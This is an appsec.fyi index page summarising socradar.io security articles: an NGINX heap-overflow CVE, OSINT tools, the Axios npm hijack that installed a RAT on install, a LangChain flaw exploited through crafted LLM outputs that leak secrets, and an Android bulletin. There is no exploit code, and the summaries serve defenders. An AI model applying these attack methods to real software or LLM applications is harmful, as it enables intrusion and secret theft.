socradar.io
Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-05-17.
| Date Added | Resource | Excerpt |
|---|---|---|
| 2026-05-17 2026 | CVE-2026-42945: NGINX Rewrite Heap Overflow Enables Remote DoS & Potential RCERCE | NGINX has a critical heap overflow vulnerability (CVE-2026-42945) in its rewrite module. This flaw allows remote attackers to trigger a denial-of-service (DoS) and potentially achieve remote code execution (RCE) by exploiting malformed rewrite rules. Users are strongly advised to update NGINX to a patched version to mitigate this security risk. |
| 2026-04-27 2026 | OSINT Tools for Cybersecurity: A Practical Guide for Security TeamsOSINT | Library of OSINT tools for cybersecurity teams, categorized by function: Domain and IP Intelligence (Shodan, DNSDumpster), Email and Credential Exposure (Have I Been Pwned, Holehe), People and Social Media Intelligence (Maltego, Sherlock), Dark Web and Paste Site Monitoring (SOCRadar, IntelligenceX), and Metadata and Search Engine Intelligence (Google Hacking Database, ExifTool). It also highlights key websites like osintframework.com and crt.sh, and details a practical investigation workflow emphasizing initial question framing and passive reconnaissance. |
| 2026-04-22 2026 | Axios npm Hijack 2026: Everything You Need to KnowSupply Chain | Analysis of the Axios npm Hijack 2026 details a sophisticated supply chain attack where threat actors compromised the lead maintainer's npm account, publishing malicious versions of the popular JavaScript library. These versions, [email protected] and [email protected], silently installed a cross-platform RAT (SILKBELL and WAVESHAPER.V2) via a hidden dependency upon `npm install`. The attack, attributed to UNC1069, bypassed standard CI/CD security by directly publishing to the npm registry using a stolen access token, highlighting the importance of OIDC provenance and SLSA checks. |
| 2026-04-22 2026 | CVE-2025-68664: Critical LangChain Flaw Enables Secret ExtractionPython | Writeup of CVE-2025-68664, a critical serialization injection vulnerability in LangChain Core, enabling secret extraction and unintended object instantiation. The flaw, stemming from improper handling of the "lc" key during data serialization and deserialization, affects Python versions >= 1.0.0 and < 1.2.5 and < 0.3.81, and a similar issue, CVE-2025-68665, impacts LangChain.js. Exploitation involves crafting attacker-controlled LLM outputs that masquerade as trusted objects, leading to risks like secret leakage and network operations. Patched versions implement deserialization allowlists and disable environment-based secret loading by default. |
| 2026-04-11 2026 | December 2025 Android Security Bulletin: Two Zero-Day Flaws ExploitedMobile | Analysis of the December 2025 Android Security Bulletin, detailing over 100 vulnerabilities. This release highlights two zero-day Framework exploits, CVE-2025-48633 (information disclosure) and CVE-2025-48572 (elevation of privilege), which are under limited, targeted exploitation across Android 13-16. The bulletin also addresses a critical Framework DoS (CVE-2025-48631), kernel privilege escalations (including pKVM and IOMMU issues), and vendor-specific flaws in Arm, Imagination GPU, MediaTek, Unisoc, and Qualcomm components. |